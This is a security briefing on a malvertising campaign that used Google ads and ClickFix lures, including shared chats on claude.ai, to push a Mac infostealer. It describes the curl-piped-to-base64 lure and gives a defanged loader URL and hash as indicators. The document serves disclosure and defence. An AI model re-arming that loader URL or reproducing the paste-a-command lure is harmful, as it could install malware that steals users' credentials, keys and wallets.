A long running malvertising operation has found an unsettling new hiding place: Claude's own website. Researchers at TrendAI Research (Trend Micro) tracked a campaign that bought Google search ads for popular AI developer tools, then funneled more than 2,000 people toward pages that tricked them into pasting a malicious command, ultimately installing data stealing malware. After weeks of using throwaway sites, the operators moved their lures onto claude.ai itself, abusing its shared chat feature so victims landed on a fully legitimate, trusted domain.
How the scam worked
The attackers ran Google Ads impersonating at least six brands, including Claude, ChatGPT Codex, Perplexity, Cursor and JetBrains, plus a parallel set of Mac "cleanup" tool scams. Anyone clicking an ad reached a page using ClickFix, a social engineering trick that talks the visitor into "fixing" a fake issue by copying a command into their terminal, the step that quietly runs the malware. Because many of the victims were developers hunting for AI tools, they were comfortable pasting commands, exactly the audience the crooks wanted.
Early waves hosted these pages on free GitLab Pages subdomains. The notable shift came when the operators began creating weaponized "shared chats" on claude.ai and pointed their ads straight at those URLs. Trend Micro's team reports the page carried a valid certificate on a trusted domain, so browser warnings, URL inspection and Safe Browsing style checks saw nothing wrong.
What the malware does
The shared chats impersonated "Apple Support" and instructed Mac users to open Terminal and run a curl command piped through base64. The decoded script (reaching out to hxxps://loserrq0j1sha8[.]com/debug/loader[.]sh) first checks whether a Russian keyboard layout is present and, if not, downloads an infostealer the researchers call MacSync that harvests browser credentials and cookies, SSH keys and cryptocurrency wallet files before exfiltrating them.
Scale and targeting
Over roughly seven weeks the campaign cycled through 106 malicious hostnames across six waves, continually rotating infrastructure and testing new AI brand lures. The Asia Pacific region absorbed about 67 percent of confirmed victims, with Taiwan alone making up roughly 30 percent, pointing to deliberate geographic ad targeting rather than opportunistic spread. After TrendAI Research notified Anthropic, the company banned the accounts behind the shared chats, disabled the malicious conversations, and said it is adding further abuse mitigations for the feature. The campaign is part of a wider surge in paid ad abuse; criminals recently ran thousands of fake ad campaigns across Asia Pacific and stood up fake streaming sites to push scams and malware.
What you should do
Treat any "installation" that asks you to paste a command from a web page as hostile, even on a trusted domain like claude.ai or a gitlab.io address. Download developer tools only from the vendor's official site or an official package manager such as brew, pip or npm, and avoid clicking sponsored search results for software.
Indicators (defanged): hxxps://loserrq0j1sha8[.]com/debug/loader[.]sh?build=a39427f9d5bfda11277f1a58c89b7c2d, MacSync infostealer (MD5 a39427f9d5bfda11277f1a58c89b7c2d).
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.